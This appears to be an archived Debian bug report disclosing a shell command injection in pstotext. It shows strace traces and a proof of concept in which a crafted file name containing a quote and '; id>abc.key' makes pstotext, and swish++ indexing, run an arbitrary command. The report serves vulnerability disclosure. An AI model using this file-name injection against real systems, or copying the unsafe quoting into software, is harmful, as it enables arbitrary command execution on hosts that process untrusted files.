Package: pstotext
Version: 1.9-1sarge1
Severity: grave
Justification: user security hole
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "a'b.ps"
sh: -c: line 1: unexpected EOF while looking for matching `''
sh: -c: line 2: syntax error: unexpected end of file
[EMAIL PROTECTED]:/tmp/deleteme$ mv "a'b.ps" ab.ps
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "ab.ps"
ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
[EMAIL PROTECTED]:/tmp/deleteme$ strace -s 256 -e trace=process -ff pstotext
"a'b.ps"
execve("/usr/bin/pstotext", ["pstotext", "a\'b.ps"], [/* 35 vars */]) = 0
vfork(Process 25977 attached
) = 25977
[pid 25977] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY
-dFIXEDMEDIA -dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER
/tmp/ps2tvQBxTF -- \'a\'b.ps\'"], [/* 35 vars */]) = 0
sh: -c: line 1: unexpected EOF while looking for matching `''
sh: -c: line 2: syntax error: unexpected end of file
[pid 25977] exit_group(258) = ?
Process 25977 detached
--- SIGCHLD (Child exited) @ 0 (0) ---
waitpid(25977, [{WIFEXITED(s) && WEXITSTATUS(s) == 2}], 0) = 25977
exit_group(3) = ?
You can see that I correctly quoted the parameter in the invoking shell, and
pstotext passes the parameter to the nested sh as 'a'b.ps' which obviously gets
it confused.
This could be a security issue, if you can run pstotext with an
arbitrary filename (eg. via swish++ running on some untrusted source).
eg:
[EMAIL PROTECTED]:/tmp/data$ strace -s 256 -e trace=process -ff "pstotext"
"hi.txt'; id>/tmp/abc.key; echo 'silly"
execve("/usr/bin/pstotext", ["pstotext", "hi.txt\'; id>/tmp/abc.key; echo
\'silly"], [/* 19 vars */]) = 0
arch_prctl(ARCH_SET_FS, 0x2aaaaaf7e6d0) = 0
clone(Process 9983 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD,
child_tidptr=0x2aaaaaf7e760) = 9983
[pid 9983] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY -dFIXEDMEDIA
-dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER /tmp/ps2tIqkOjd --
\'hi.txt\'; id>/tmp/abc.key; echo \'silly\'"], [/* 19 vars */]) = 0
[pid 9983] arch_prctl(ARCH_SET_FS, 0x2aaaab0576d0) = 0
[pid 9983] clone(Process 9984 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD,
child_tidptr=0x2aaaab057760) = 9984
[pid 9983] wait4(-1, Process 9983 suspended
<unfinished ...>
[pid 9984] execve("/usr/bin/gs", ["gs", "-r72", "-dNODISPLAY", "-dFIXEDMEDIA",
"-dDELAYBIND", "-dWRITESYSTEMDICT", "-q", "-dNOPAUSE", "-dSAFER",
"/tmp/ps2tIqkOjd", "--", "hi.txt"], [/* 18 vars */]) = 0
[pid 9984] arch_prctl(ARCH_SET_FS, 0x2aaaace67b30) = 0
ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
[pid 9984] exit_group(0) = ?
Process 9983 resumed
Process 9984 detached
[pid 9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0,
NULL) = 9984
[pid 9983] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 9983] wait4(-1, 0x7fffffb1ce14, WNOHANG, NULL) = -1 ECHILD (No child
processes)
[pid 9983] clone(Process 9985 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD,
child_tidptr=0x2aaaab057760) = 9985
[pid 9983] wait4(-1, Process 9983 suspended
<unfinished ...>
[pid 9985] execve("/usr/bin/id", ["id"], [/* 18 vars */]) = 0
[pid 9985] arch_prctl(ARCH_SET_FS, 0x2aaaaadf96d0) = 0
[pid 9985] exit_group(0) = ?
Process 9983 resumed
Process 9985 detached
[pid 9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0,
NULL) = 9985
[pid 9983] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 9983] wait4(-1, 0x7fffffb1ce34, WNOHANG, NULL) = -1 ECHILD (No child
processes)
[pid 9983] exit_group(0) = ?
Process 9983 detached
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(9983, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9983
exit_group(0) = ?
You can clearly see that I tricked pstotext into running id and outputing the
result into a temp file.
If I do the following:
[EMAIL PROTECTED]:/tmp/data$ touch "hi.txt'; id>abc.key; echo 'silly.ps"
[EMAIL PROTECTED]:/tmp/data$ rm abc.key
[EMAIL PROTECTED]:/tmp/data$ ls -l
total 0
-rw-r--r-- 1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps
I can trick swish++ into running an arbitrary command by passing
the filename through pstotext:
[EMAIL PROTECTED]:/tmp/data$ 'index++' -v4 '--config-file'
'/usr/share/sitebuilder/core/indexing.conf' '--index-file' /tmp/abcd /tmp/data
/tmp/data:
hi.txt'; id>abc.key; echo 'silly.psESP Ghostscript 7.07.1: Unrecoverable
error, exit code 1
(skipped: can not open)
index++: done:
00:01 (min:sec) elapsed time
1 files, 0 indexed
0 words, 0 indexed, 0 unique
[EMAIL PROTECTED]:/tmp/data$ ls -l
total 4
-rw-r--r-- 1 ivt ivt 162 2006-03-15 16:51 abc.key
-rw-r--r-- 1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps
[EMAIL PROTECTED]:/tmp/data$ cat abc.key
uid=1000(ivt) gid=1000(ivt)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(lpadmin),105(scanner),106(admin),1000(ivt)
as you can see, pstotext was tricked into running the id command and
the result appeared in abc.key.
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (50, 'unstable')
Architecture: powerpc (ppc)
Kernel: Linux 2.6.8-pegasos
Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8)
Versions of packages pstotext depends on:
ii gs 8.01-5 Transitional package
ii gs-esp [gs] 7.07.1-9 The Ghostscript PostScript interpr
ii gs-gpl [gs] 8.01-5 The GPL Ghostscript PostScript int
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
-- no debconf information
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (50, 'unstable')
Architecture: powerpc (ppc)
Kernel: Linux 2.6.8-pegasos
Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8)
Versions of packages pstotext depends on:
ii gs 8.01-5 Transitional package
ii gs-esp [gs] 7.07.1-9 The Ghostscript PostScript interpr
ii gs-gpl [gs] 8.01-5 The GPL Ghostscript PostScript int
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
-- no debconf information
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
